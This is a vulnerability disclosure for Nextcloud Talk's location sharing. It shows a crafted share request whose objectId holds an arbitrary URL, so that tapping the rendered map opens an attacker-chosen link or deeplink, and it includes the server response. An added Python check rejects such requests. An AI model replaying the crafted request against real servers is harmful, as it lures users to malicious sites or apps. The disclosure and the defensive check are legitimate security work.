The Nextcloud Talk app allows a user to share their location in the mobile app.
The objectId= parameter in /ocs/v2.php/apps/spreed/api/v1/chat/$token/share can be set to a URL or deeplink, while metaData= still renders the map. Once a user clicks the map, it opens the URL or deeplink defined in the crafted request.
For days, I’ve been thinking and trying different ways to increase its severity, but I guess I’m stuck, so here I am reporting this.
Note: Location Sharing is only allowed in the Mobile App.
Request
Below. Set objectId= to whatever URL you want to point it at.
POST /ocs/v2.php/apps/spreed/api/v1/chat/wqfqmw9n/share HTTP/2
Host: localhost
Cookie: oc_sessionPassphrase=cookie; __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; occi3pyo3vg0=6lheeis7ot8kcnvdgq12ijl90e
Authorization: Basic
User-Agent: Mozilla/5.0 (Android) Nextcloud-Talk v12.2.1
Accept: application/json
Ocs-Apirequest: true
Content-Type: application/x-www-form-urlencoded
Content-Length: 227
Accept-Encoding: gzip, deflate

objectType=geo-location&objectId=https://ctulhu.me&referenceId=kkk&metaData={"type":"geo-location","id":"geo:14.600765443470294,121.00452968052457","latitude":"14.600765443470294","longitude":"121.00452968052457","name":"hehe"}

HTTP/2 201 Created
Date: Sat, 11 Sep 2021 17:30:22 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 509
Expires: Thu, 19 Nov 1981 08:52:00 GMT

{"ocs":{"meta":{"status":"ok","statuscode":201,"message":"OK"},"data":{"id":237,"token":"wqfqmw9n","actorType":"users","actorId":"secret","actorDisplayName":"secret","timestamp":1631381422,"message":"{object}","messageParameters":{"actor":{"type":"user","id":"secret","name":"secret"},"object":{"type":"geo-location","id":"https:\/\/ctulhu.me","latitude":"14.600765443470294","longitude":"121.00452968052457","name":"hehe"}},"systemMessage":"","messageType":"comment","isReplyable":true,"referenceId":"kkk"}}}
An attacker can abuse this to trick the user into opening a malicious URL or third-party app.
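A server-side style check that would reject the request above, written here as an added example (it is not part of the original report and not Nextcloud's own fix). It assumes a legitimate location share carries the same geo: URI in objectId that the mobile app puts in the metaData id field; the function name check_geo_share and the benign sample body are constructed for illustration.

```python
import json
import re
from urllib.parse import parse_qs

# geo:<lat>,<lon> with plain decimal coordinates only (a strict subset of RFC 5870)
GEO_URI = re.compile(r"geo:(-?\d{1,2}(?:\.\d+)?),(-?\d{1,3}(?:\.\d+)?)")

# Form body taken from the request in the report.
REPORTED_BODY = (
    'objectType=geo-location&objectId=https://ctulhu.me&referenceId=kkk&metaData='
    '{"type":"geo-location","id":"geo:14.600765443470294,121.00452968052457",'
    '"latitude":"14.600765443470294","longitude":"121.00452968052457","name":"hehe"}'
)
# Constructed benign body: same share, but objectId is the geo: URI itself.
BENIGN_BODY = REPORTED_BODY.replace(
    "objectId=https://ctulhu.me",
    "objectId=geo:14.600765443470294,121.00452968052457",
)


def check_geo_share(form_body: str) -> list[str]:
    """Return the problems found in a chat/share form body; empty list means OK."""
    fields = {k: v[0] for k, v in parse_qs(form_body, keep_blank_values=True).items()}
    if fields.get("objectType") != "geo-location":
        return []  # this check only covers location shares
    problems = []
    object_id = fields.get("objectId", "")
    match = GEO_URI.fullmatch(object_id)
    if not match:
        # Anything that is not geo:lat,lon (http(s) URLs, app deeplinks) is refused.
        problems.append(f"objectId is not a geo: URI: {object_id!r}")
    else:
        lat, lon = float(match.group(1)), float(match.group(2))
        if not (-90 <= lat <= 90 and -180 <= lon <= 180):
            problems.append("coordinates out of range")
    try:
        meta = json.loads(fields.get("metaData", ""))
    except json.JSONDecodeError:
        return problems + ["metaData is not valid JSON"]
    # The map preview is built from metaData, so it must describe the same target.
    meta_id = meta.get("id") if isinstance(meta, dict) else None
    if meta_id != object_id:
        problems.append("metaData id does not match objectId")
    return problems


if __name__ == "__main__":
    for label, body in (("reported", REPORTED_BODY), ("benign", BENIGN_BODY)):
        print(label, check_geo_share(body) or "OK")
```

The same comparison can be applied on the client before opening the link behind a rendered map, so that a tap never dispatches anything other than a geo: URI.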